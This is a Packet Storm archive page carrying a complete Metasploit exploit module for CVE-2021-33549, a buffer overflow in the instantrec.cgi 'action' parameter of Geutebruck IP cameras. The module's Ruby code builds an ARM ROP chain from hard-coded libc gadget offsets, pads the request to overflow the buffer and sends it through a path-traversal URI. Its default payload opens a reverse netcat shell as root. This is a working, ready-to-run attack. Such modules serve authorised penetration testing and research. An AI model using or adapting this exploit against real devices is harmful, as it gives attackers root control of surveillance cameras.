exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Geutebruck instantrec Remote Command Execution

Geutebruck instantrec Remote Command Execution
Posted Sep 17, 2021
Authored by Titouan Lazard, Ibrahim Ayadhi | Site metasploit.com

This Metasploit module exploits a buffer overflow within the 'action' parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions equal to 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.

tags | exploit, remote, overflow, cgi, root, code execution
advisories | CVE-2021-33549
SHA-256 | c4e4d56427af88f4e0240499806563abb1fa94b80fc1c5bdc3ba921dbbbafb67

Geutebruck instantrec Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Geutebruck instantrec Remote Command Execution',
'Description' => %q{
This module exploits a buffer overflow within the 'action'
parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware
versions 1.12.13.2 and 1.12.14.5.
Successful exploitation results in remote code execution as the root user.
},

'Author' => [
'Titouan Lazard - RandoriSec', # Discovery
'Ibrahim Ayadhi - RandoriSec' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33549'],
['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
['URL', 'http://geutebruck.com'],
['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => %w[unix linux],
'Arch' => [ARCH_ARMLE],
'Targets' => [
['Automatic Target', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])
]
)
end

def write_payload
# gadgets
libc_add = 0x402da000
system_off = 0x00357fc
libc_data_off = 0x12c960
str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;
pop_r0_off = 0x00101de4 # pop r0 pc
pop_r1_off = 0x0010252c # pop r1 pc
pop_r4_off = 0x00015164 # pop r4 pc
system_ = libc_add + system_off
str_r1 = libc_add + str_r1_off
pop_r0 = libc_add + pop_r0_off
pop_r1 = libc_add + pop_r1_off
pop_r4 = libc_add + pop_r4_off
add_str = libc_data_off + libc_add + 4
chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')
rop = []
rop += [pop_r4]
rop += [add_str - 0x14]
chunks.each_with_index do |chunk, index|
rop += [pop_r1]
rop += [chunk]
rop += [str_r1]
rop += if index != (chunks.length - 1)
[add_str - 0x14 + ((index + 1) * 4)]
else
[0x41414141]
end
end
rop += [pop_r0]
rop += [add_str]
rop += [system_]
rop.pack('V*')
end

def exploit
print_status("#{rhost}:#{rport} - Attempting to exploit...")
pad_size = 536
data = Rex::Text.pattern_create(pad_size) + write_payload
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),
'vars_post' => {
'action' => data
}
)
handler
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close